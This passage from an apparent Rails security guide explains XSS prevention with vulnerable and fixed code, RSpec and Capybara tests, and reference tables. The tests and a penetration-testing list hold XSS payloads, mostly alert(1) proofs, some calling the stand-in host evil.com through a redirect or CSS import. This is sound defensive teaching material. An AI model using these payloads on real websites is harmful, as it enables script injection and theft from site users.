Forgetting context-specific encoding creates vulnerabilities when embedding data in different contexts. HTML encoding doesn't protect JavaScript contexts, and JavaScript encoding doesn't protect HTML contexts.

# VULNERABLE: Wrong encoding for context
<a href="/search?q=<%= CGI.escapeHTML(params[:query]) %>">
  Search
</a>
# Should use URL encoding: CGI.escape(params[:query])

<script>
  var searchQuery = "<%= CGI.escapeHTML(params[:query]) %>";
</script>
# Should use JavaScript encoding: j params[:query]

# CORRECT: Context-appropriate encoding
<a href="/search?q=<%= CGI.escape(params[:query]) %>">Search</a>

<script>
  var searchQuery = "<%= j params[:query] %>";
</script>
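
The difference between encoders is easiest to see by running one input through each of them. This sketch uses only the Ruby standard library; encode_for and its context names are hypothetical, and the JavaScript branch is an assumption about one reasonable way to build a string literal without Rails.

```ruby
require "cgi"
require "erb"
require "json"

# Hypothetical dispatcher: pick the encoder that matches the output context.
def encode_for(context, value)
  case context
  when :html      then CGI.escapeHTML(value)
  when :url_query then CGI.escape(value)
  when :url_path  then ERB::Util.url_encode(value)
  when :js_string
    # Quoted JavaScript string literal with script-breaking characters escaped.
    JSON.generate(value).gsub(/[<>&]/, "<" => '\u003c', ">" => '\u003e', "&" => '\u0026')
  else
    raise ArgumentError, "unknown context: #{context}"
  end
end

query = %q{a&b=<c> "d"}

%i[html url_query url_path js_string].each do |context|
  puts "#{context}: #{encode_for(context, query)}"
end
```

No single output is valid in the other three contexts, which is the reason encoding has to be chosen at the point of output rather than at input time.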

DOM-based XSS in JavaScript code goes undetected by server-side protections. Developers write vulnerable client-side code that reads from unsafe sources and writes to dangerous sinks.

// VULNERABLE: DOM-based XSS
// Unsafe source: window.location.hash
var userContent = window.location.hash.substring(1);
document.getElementById('content').innerHTML = userContent;

// Attack URL: http://example.com/#<img src=x onerror=alert(1)>

// SAFE: Sanitize or use textContent
var userContent = window.location.hash.substring(1);
document.getElementById('content').textContent = userContent;

// Or sanitize before rendering
var sanitized = DOMPurify.sanitize(userContent);
document.getElementById('content').innerHTML = sanitized;

Overriding CSP with unsafe directives negates its protection. Developers add unsafe-inline and unsafe-eval to CSP policies to fix broken functionality rather than addressing the underlying security issues.

# WEAK CSP: Too permissive
SecureHeaders::Configuration.default do |config|
  config.csp = {
    default_src: %w['self'],
    script_src: %w['self' 'unsafe-inline' 'unsafe-eval'],  # Defeats XSS protection
    style_src: %w['self' 'unsafe-inline']
  }
end

# STRONG CSP: No unsafe directives (add nonces or hashes for any inline scripts that must remain)
SecureHeaders::Configuration.default do |config|
  config.csp = {
    default_src: %w['self'],
    script_src: %w['self'],  # No unsafe directives
    style_src: %w['self'],
    upgrade_insecure_requests: true
  }
end
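
Nonce and hash sources can be sketched without any gem. The build_csp helper, the inline script text, and the directive set below are assumptions for illustration; a real application would normally let its CSP library generate and inject the nonce per request.

```ruby
require "securerandom"
require "digest"

# Hypothetical helper: serialize a directive hash into a header value.
def build_csp(directives)
  directives.map { |name, sources| "#{name} #{sources.join(' ')}" }.join("; ")
end

# A fresh, unpredictable nonce must be generated for every response.
nonce = SecureRandom.base64(16)

# A hash source allows one specific inline script by its exact content.
inline_script = "console.log('boot');"
script_hash = Digest::SHA256.base64digest(inline_script)

directives = {
  "default-src" => ["'self'"],
  "script-src"  => ["'self'", "'nonce-#{nonce}'", "'sha256-#{script_hash}'"],
  "style-src"   => ["'self'"]
}

header = build_csp(directives)
puts header
```

An inline script then runs only if its tag carries the matching nonce attribute or its content matches the hash, so injected markup without either is refused by the browser.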

Trusting client-side validation creates a false sense of security. Attackers bypass client-side checks by modifying requests or disabling JavaScript, so every constraint must be enforced again on the server regardless of client-side protections.

# VULNERABLE: Only client-side validation
# app/views/posts/new.html.erb
<%= form_with model: @post do |f| %>
  <%= f.text_field :title, pattern: "[A-Za-z0-9 ]+" %>
  <%= f.submit %>
<% end %>

# SAFE: Server-side validation
class Post < ApplicationRecord
  validates :title, format: { 
    with: /\A[A-Za-z0-9 ]+\z/,
    message: "only allows letters, numbers, and spaces"
  }
  
  before_save :sanitize_content
  
  def sanitize_content
    self.body = ActionController::Base.helpers.sanitize(body)
  end
end
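
The choice of \A and \z in the server-side pattern matters, because ^ and $ match at every line boundary in Ruby. The constant names and the sample input below are illustrative; Rails' format validator also rejects patterns with ^ or $ unless multiline: true is passed.

```ruby
# Line anchors: satisfied if any single line matches.
LINE_ANCHORED = /^[A-Za-z0-9 ]+$/

# String anchors: the whole value must match.
STRING_ANCHORED = /\A[A-Za-z0-9 ]+\z/

input = "Harmless title\n<script>alert(1)</script>"

puts LINE_ANCHORED.match?(input)
puts STRING_ANCHORED.match?(input)
puts STRING_ANCHORED.match?("Harmless title")
```

With line anchors, a payload hidden after a newline passes validation because the first line alone satisfies the pattern.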

Testing Approaches

XSS testing requires both automated tools and manual testing to achieve comprehensive coverage. Automated scanners detect common patterns but miss context-specific vulnerabilities and complex attack chains.

Security test suites should include XSS-specific test cases covering reflected, stored, and DOM-based variants. These tests verify that malicious input receives proper encoding or sanitization before output.

# RSpec tests for XSS prevention
require 'rails_helper'

RSpec.describe Post, type: :model do
  describe "XSS prevention" do
    let(:xss_payload) { "<script>alert('XSS')</script>" }
    let(:post) { Post.create(title: "Test", body: xss_payload) }
    
    it "sanitizes script tags from body" do
      # The Rails sanitizer strips the <script> element but typically keeps
      # its inner text as inert content, so only the tag is asserted here
      expect(post.body).not_to include("<script>")
    end
    
    it "preserves safe HTML tags" do
      safe_content = "<p>Paragraph</p><strong>Bold</strong>"
      # A valid title is required; otherwise the record is never saved
      # and the before_save sanitizer does not run
      post = Post.create(title: "Test", body: safe_content)
      
      expect(post.body).to include("<p>")
      expect(post.body).to include("<strong>")
    end
    
    it "removes dangerous attributes" do
      post = Post.create(title: "Test", body: '<a href="javascript:alert(1)">Link</a>')
      expect(post.body).not_to include("javascript:")
    end
    
    it "handles nested XSS attempts" do
      nested = '<div><script>alert(1)</script></div>'
      post = Post.create(title: "Test", body: nested)
      
      expect(post.body).not_to include("<script>")
    end
  end
end

RSpec.describe CommentsController, type: :controller do
  describe "POST #create" do
    let(:article) { create(:article) }
    let(:user) { create(:user) }
    
    before { sign_in user }
    
    it "sanitizes comment body" do
      xss_payload = "<script>document.location='http://evil.com'</script>"
      
      post :create, params: {
        article_id: article.id,
        comment: { body: xss_payload }
      }
      
      comment = Comment.last
      expect(comment.body).not_to include("<script>")
    end
    
    it "preserves allowed HTML" do
      safe_html = "<p>Comment with <strong>bold</strong> text</p>"
      
      post :create, params: {
        article_id: article.id,
        comment: { body: safe_html }
      }
      
      comment = Comment.last
      expect(comment.body).to include("<strong>")
    end
  end
end

Integration tests verify that XSS protections work throughout the request-response cycle, from user input through database storage to rendered output.

# Integration tests for XSS
require 'rails_helper'

RSpec.describe "XSS Protection", type: :request do
  describe "search functionality" do
    it "escapes search queries in results" do
      xss_query = "<script>alert('XSS')</script>"
      
      get search_path, params: { q: xss_query }
      
      expect(response.body).not_to include("<script>alert")
      expect(response.body).to include(CGI.escapeHTML(xss_query))
    end
    
    it "does not emit javascript: URLs as links" do
      javascript_url = "javascript:alert(document.cookie)"
      
      get search_path, params: { q: javascript_url }
      
      # The query may be echoed as escaped text; it must never become an href
      expect(response.body).not_to include('href="javascript:')
    end
  end
  
  describe "user profiles" do
    let(:user) { create(:user) }
    
    it "sanitizes bio HTML" do
      user.update(bio: "<script>alert(1)</script><p>Bio</p>")
      
      get user_path(user)
      
      expect(response.body).not_to include("<script>")
      expect(response.body).to include("<p>Bio</p>")
    end
    
    it "validates website URLs" do
      user.update(website: "javascript:alert(1)")
      
      get user_path(user)
      
      expect(response.body).not_to include('href="javascript:')
    end
  end
end

Feature tests with Capybara verify XSS protection from an end-user perspective, ensuring malicious content doesn't execute in the browser.

# Feature tests with Capybara
require 'rails_helper'

RSpec.feature "XSS Prevention in Comments", type: :feature do
  let(:user) { create(:user) }
  let(:article) { create(:article) }
  
  before do
    login_as(user)
  end
  
  scenario "script tags are sanitized from comments" do
    visit article_path(article)
    
    fill_in "Comment", with: "<script>alert('XSS')</script>Comment text"
    click_button "Post Comment"
    
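    # have_selector ignores non-visible elements such as <script>,
    # so check the rendered markup for the injected tag instead
    expect(page.html).not_to include("<script>alert('XSS')</script>")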
    expect(page).to have_content("Comment text")
  end
  
  scenario "dangerous event handlers are removed" do
    visit article_path(article)
    
    xss_comment = '<img src=x onerror="alert(1)">'
    fill_in "Comment", with: xss_comment
    click_button "Post Comment"
    
    expect(page.html).not_to include("onerror")
  end
  
  scenario "safe formatting is preserved" do
    visit article_path(article)
    
    safe_comment = "Comment with <strong>bold</strong> and <em>italic</em>"
    fill_in "Comment", with: safe_comment
    click_button "Post Comment"
    
    expect(page).to have_selector("strong", text: "bold")
    expect(page).to have_selector("em", text: "italic")
  end
end

Manual penetration testing complements automated tests by exploring complex attack chains and context-specific vulnerabilities. Testers attempt various encoding schemes, nested payloads, and protocol handlers.

# Penetration testing checklist
module XssPenetrationTests
  PAYLOADS = [
    # Basic XSS
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    
    # Encoded XSS
    "&#60;script&#62;alert(1)&#60;/script&#62;",
    "%3Cscript%3Ealert(1)%3C/script%3E",
    
    # Nested tags
    "<scr<script>ipt>alert(1)</scr</script>ipt>",
    
    # Event handlers
    "<body onload=alert(1)>",
    "<input onfocus=alert(1) autofocus>",
    
    # Protocol handlers
    '<a href="javascript:alert(1)">Link</a>',
    '<a href="data:text/html,<script>alert(1)</script>">Link</a>',
    
    # CSS-based XSS
    '<style>@import"http://evil.com/xss.css";</style>',
    
    # SVG-based XSS
    '<svg><script>alert(1)</script></svg>',
    
    # NULL byte injection
    "<script>alert(1)\x00</script>",
    
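    # Unicode bypass (%q keeps the \u escapes literal instead of letting Ruby decode them)
    %q(<script>alert\u0028'XSS'\u0029</script>)
  ].freeze
  
  # Yields each payload appended to a benign value so the caller decides how to submit it
  def self.test_input(field, value)
    PAYLOADS.each do |payload|
      yield field, value + payload
    end
  end
end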
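
A payload list becomes more useful when it is run against an encoder automatically. The sketch below is a minimal harness under stated assumptions: leaking_payloads is a hypothetical helper, the payload list is a small sample, and the check for raw markup characters is a coarse heuristic rather than a complete XSS oracle.

```ruby
require "cgi"

SAMPLE_PAYLOADS = [
  "<script>alert(1)</script>",
  "<img src=x onerror=alert(1)>",
  '<a href="javascript:alert(1)">Link</a>'
].freeze

# Returns the payloads whose encoded form still contains raw markup characters.
def leaking_payloads(payloads, &encoder)
  payloads.select { |payload| encoder.call(payload).match?(/[<>"]/) }
end

# An HTML escaper should leave nothing behind.
escaped = leaking_payloads(SAMPLE_PAYLOADS) { |p| CGI.escapeHTML(p) }

# A pass-through "encoder" leaks every payload.
unescaped = leaking_payloads(SAMPLE_PAYLOADS) { |p| p }

puts escaped.length
puts unescaped.length
```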

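CSP validation tests ensure Content Security Policy headers are present and contain the expected directives. Whether the browser actually blocks unauthorized resources can only be confirmed in a real browser session.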

# CSP testing
RSpec.describe "Content Security Policy", type: :request do
  it "sets strict CSP headers" do
    get root_path
    
    csp_header = response.headers['Content-Security-Policy']
    expect(csp_header).to include("default-src 'self'")
    expect(csp_header).to include("script-src 'self'")
    expect(csp_header).not_to include("unsafe-inline")
  end
  
  it "includes frame-ancestors protection" do
    get root_path
    
    csp_header = response.headers['Content-Security-Policy']
    expect(csp_header).to include("frame-ancestors 'none'")
  end
  
  it "sets X-Content-Type-Options" do
    get root_path
    
    expect(response.headers['X-Content-Type-Options']).to eq('nosniff')
  end
end
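
Substring checks on the header are sensitive to directive order and spacing. One option is to parse the header into a hash first, as in this sketch; parse_csp is a hypothetical helper and the sample header is made up for illustration.

```ruby
# Hypothetical helper: split a CSP header into { directive => [sources] }.
def parse_csp(header)
  header.split(";").map(&:strip).reject(&:empty?).each_with_object({}) do |directive, parsed|
    name, *sources = directive.split(/\s+/)
    parsed[name.downcase] = sources
  end
end

sample = "default-src 'self'; script-src 'self' 'nonce-abc123'; frame-ancestors 'none'; upgrade-insecure-requests"
policy = parse_csp(sample)

puts policy["script-src"].inspect
puts policy.fetch("script-src").include?("'unsafe-inline'")
puts policy.key?("frame-ancestors")
```

In a request spec the same helper could be applied to response.headers['Content-Security-Policy'], so that each assertion targets a single directive.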

Reference

XSS Attack Vectors

Vector Type | Example | Prevention
Script Tag | <script>alert(1)</script> | HTML escape output
Image Error | <img src=x onerror=alert(1)> | Sanitize attributes
Event Handler | <body onload=alert(1)> | Remove event attributes
JavaScript URL | <a href="javascript:alert(1)"> | Validate URL schemes
SVG Inline | <svg onload=alert(1)> | Sanitize SVG content
Data URL | <a href="data:text/html,<script>alert(1)"> | Block data URLs
Form Action | <form action="javascript:alert(1)"> | Validate form targets
Meta Refresh | <meta http-equiv="refresh" content="0;url=javascript:alert(1)"> | Sanitize meta tags
CSS Expression | <style>body{background:expression(alert(1))}</style> | Block CSS expressions
Object/Embed | <object data="javascript:alert(1)"> | Remove object tags

Ruby Encoding Methods

Context | Method | Effect
HTML Content | CGI.escapeHTML | Escapes <, >, &, ", '
HTML Attribute | CGI.escapeHTML | Same as HTML content; the attribute value must be quoted
JavaScript String | escape_javascript (j) | Escapes quotes, newlines, backslashes, and </
URL Parameter | CGI.escape | Percent-encodes special characters; space becomes +
URL Component | ERB::Util.url_encode | Percent-encodes special characters; space becomes %20
JSON | to_json + json_escape | Safe JSON in JavaScript context

Rails Sanitizer Configuration

Option | Values | Purpose
tags | Array of tag names | Allowlist of permitted HTML tags
attributes | Array of attribute names | Allowlist of permitted attributes
protocols | Hash of tag => attribute => schemes | Allowed URL protocols (an option of the Sanitize gem; the Rails sanitize helper does not accept it)
scrubber | Custom scrubber object | Advanced sanitization logic

Content Security Policy Directives

Directive | Purpose | Example Values
default-src | Fallback for all resources | 'self', 'none'
script-src | JavaScript sources | 'self', 'unsafe-inline', 'nonce-abc123'
style-src | CSS sources | 'self', 'unsafe-inline'
img-src | Image sources | 'self', https:, data:
font-src | Font sources | 'self', https://fonts.gstatic.com
connect-src | AJAX/WebSocket targets | 'self', https://api.example.com
frame-ancestors | Embedding restrictions | 'none', 'self'
base-uri | Base tag restrictions | 'self'
form-action | Form submission targets | 'self'

Security Headers

Header | Value | Purpose
Content-Security-Policy | See CSP directives | Restricts resource loading
X-Content-Type-Options | nosniff | Prevents MIME sniffing
X-Frame-Options | DENY or SAMEORIGIN | Prevents clickjacking
X-XSS-Protection | 0 | Disables the legacy browser XSS filter (deprecated; rely on CSP instead)
Referrer-Policy | strict-origin-when-cross-origin | Controls referrer info

Cookie Security Attributes

Attribute | Purpose | Setting
HttpOnly | Prevents JavaScript access | httponly: true
Secure | HTTPS transmission only | secure: true
SameSite | CSRF protection | same_site: :strict or :lax

Testing XSS Payloads

Payload Category | Example
Basic HTML | <script>alert(1)</script>
Encoded HTML | &lt;script&gt;alert(1)&lt;/script&gt;
Event Handlers | <img src=x onerror=alert(1)>
JavaScript Protocol | <a href="javascript:alert(1)">
Nested Tags | <scr<script>ipt>alert(1)</scr</script>ipt>
NULL Byte | <script>alert(1)\x00</script>
Unicode Encoding | <script>alert\u0028'XSS'\u0029</script>
CSS Injection | <style>@import'http://evil.com'</style>
SVG Vector | <svg/onload=alert(1)>
Data URI | <iframe src="data:text/html,<script>alert(1)">